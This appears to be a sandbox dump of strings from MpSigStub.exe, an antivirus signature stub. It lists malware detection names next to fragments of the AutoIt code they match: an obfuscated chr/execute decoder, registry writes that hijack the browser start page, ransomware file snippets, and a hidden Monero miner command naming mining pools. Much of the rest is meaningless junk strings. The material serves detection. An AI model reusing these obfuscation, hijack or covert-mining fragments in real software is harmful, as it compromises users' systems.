Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 4dllopen ( "advapi32.dll" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: func _crypt_encryptdata ( $
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: p = true )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dobjcreate ( "msxml2.domdocument" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0.datatype = "bin.base64"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: return seterror (
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: -dwv1.3.au3.509"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $"4054656d70446972"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "313232"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "3937"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 633323339323732393239272929"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ar_3108!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: global $d3076 = execute
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dim $t31qy644 = $d3076 ( "chr" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:trojan:win32/startpage.zw!bit
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:ransom:win32/tron.pb!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $extension = "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: guicreate ( "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: _filecreate ( @appdatadir & "\network\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: filecopy ( "c:\programdata\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: " , "c:\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#allowlist:bonzo
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_outfile=helpnew.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_res_companyname=bonzo
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: global $sservicename = "tvnserver"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: opt ( "trayiconhide" , 0 )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \webhelper.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0-o strat
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ://xmr.2miners.com
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ://randomxmonero.usa-east.nicehash.com
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ( "6c6c5374727563744765745074722824744275666629290x446c6c5374727563744372656174652822627974655b222026202469506c61696e54657874536
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ( "666292c202264776f7264222c2031290x446c6c43616c6c2824646c6c68616e646c652c2022626f6f6c222c202243727970744861736844617461222c2022
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ( "6c222c204578656375746528225472756522292c202264776f7264222c20302c20227374727563742a222c20
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ]jfq-'+
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: x=o%o%w
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \|-mto
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ojp\|bhd
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: h(`vla
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: =>7=r
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0+l+n>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: )m%n)\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: j5t6d"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: cc.jb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #ul57p
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ^gv*f
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: you*'
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: trym7d
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &u@0e
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *{n&}`
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $23r
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: }#+u0
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: fblu~
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: n1a%s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ~<n+s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: x$)*@
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: bozcj1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: n^rht
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ;ugup
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: zpp~q]
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: y\b\|
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: gkld
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: }k'\|!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ehcmp@
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: m?ht_7+v
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ?8;0]urk
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: nybp0
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: )l2j~q
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: vy9xt
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: g&).g
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 6#,3x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: a2,bb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 7%3%?
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: i`'dy{
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 1v<20
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: w}cji
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 7\|p7q2}
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 7ju(8
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ikc9u
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: c\sp}
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 8c%gm
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ($.7c-
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: s5h3n9
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: snpy(\(i
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: k!711~
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: i"lpy8\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ji*e@;
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: '[z5wj
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: z9`d6
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: /q<4o
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 2;\|\|7
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: e_ju4
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: y&yxqc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \(5,_!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: b'cp/p
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ?.>7r
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: k~]pdzjso
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 'p2_s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: rxhgruyd
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &`\li
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: k~[rm
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [vywx?z
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: defxj
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: sl=v:
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +*<~s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #fkk(3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \@\|ux"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: gxctu
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: b&m;]
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: pbg,l
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tpx;@=z
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: (-?s84
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: `ln"m
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: `ln"mm(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: /<\|rx
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: an['y
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: mbli_g3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ep]m\|
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: g{~</ba
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: b':'0
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dp\|7^
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ]9;xo`
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *'^ha
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: >hs;v1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: j.r` i
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 'wnf/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ove7b
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: w.;ggq
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: nnu[%u
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: kq?"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "](e`tz
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: b@sc6
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: x}hs`\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &jk2f
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: oaiub
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,fn$\|
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ba(p4
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [:hmw
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: }p[@&
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: bd~o4
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: n?5n`
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: s2!d2t
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: c!w"h
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ?+?7h
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #gtyf
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: c;v`%
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: y^>]j
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: z;d(4
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +n7]0
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qs[vr`
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ]wq8awl5
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ;>\.sl2
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: /fn,>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: wsnw
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: =#u(.
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: e@\z+)
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: @14aa+*
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qu>w6
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 2g'h^
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: pp$b f
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: q*s5:s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,q2\|9mj
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +(w9q<f
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: m}m_=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: <,pas
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: j@>*b)
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: fcdo=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: :e34mi
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qkq%g
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: -r-ma{#
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ;}djfm_
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: e) =g
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: a;6!n
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0kprr
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tws[zf
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: j)l*p
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tz\ij$.
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dhiwi%
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: i^(m=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 4~jfl
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 2c<se
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: i])h}t
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #(anz
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #ks\|q
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: </ims1=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *^fza9
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: b}sa[6
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 2_;)u
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: hzu3j
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: @;6y^
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: oya9&-
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: x\c'b
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qzj"v
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: bw}v=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 7vq7
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: =ij.f^
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ; _:p
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: :zq)pi
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [ov(jm
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ms2-r$
